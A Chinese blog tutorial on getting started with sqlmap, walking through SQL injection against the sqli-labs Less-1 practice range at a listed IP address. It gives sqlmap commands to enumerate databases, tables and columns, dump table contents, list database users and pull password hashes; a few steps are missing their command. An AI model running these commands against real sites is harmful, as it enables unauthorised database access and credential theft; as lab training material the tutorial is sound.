SQL注入之sqlmap入门学习(sqlmap注入原理)真没想到

随心笔谈2年前发布 编辑
155 0
🌐 经济型:买域名、轻量云服务器、用途:游戏 网站等 《腾讯云》特点:特价机便宜 适合初学者用 点我优惠购买
🚀 拓展型:买域名、轻量云服务器、用途:游戏 网站等 《阿里云》特点:中档服务器便宜 域名备案事多 点我优惠购买
🛡️ 稳定型:买域名、轻量云服务器、用途:游戏 网站等 《西部数码》 特点:比上两家略贵但是稳定性超好事也少 点我优惠购买



目录一、判断是否存在注入点二、查询当前用户下所有数据库三、获取数据库中的表名四、获取表中的字段名五、获取字段内容六、获取数据库的所有用户七、获取数据库用户的密码八、获取当前网站数据库的名称九、获取当前网站数据库的用户名称

原来sql注入如此简单

以SQL注入靶场sqli-labs第一关为例,进行sqlmap工具的使用分享。

使用命令:

使用命令:

有图中白色背景的 则判断出有注入点

使用命令:

sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –dbs

可以看到有五个表

选取一个challenges数据库,获取此库的表名

使用命令:

sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges –tables

选取表T5M0QG6FM2,获取其中字段名

使用命令:

sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges -T T5M0QG6FM2 –columns

使用命令:

sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” -D challenges -T T5M0QG6FM2 –columns –dump

使用命令:

sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –users

使用该命令就可以列出所有管理用户

使用命令:

sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –passwords

使用命令:

sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –current-db

可以看到当前的数据库是 security

使用命令:

sqlmap -u “http://49.232.78.252:83/Less-1/?id=1” –current-user

当前用户是root

到此这篇关于SQL注入之sqlmap入门学习的文章就介绍到这了,更多相关sqlmap入门内容请搜索脚本之家以前的文章或继续浏览下面的相关文章希望大家以后多多支持脚本之家!

您可能感兴趣的文章:sqlmap之os?shell图文详细解析教你编写SQLMap的Tamper脚本过狗SQLMAP插件tamper模块简介SQLMAP插件tamper编写与使用详解sqlmap注入图文详解

© 版权声明

相关文章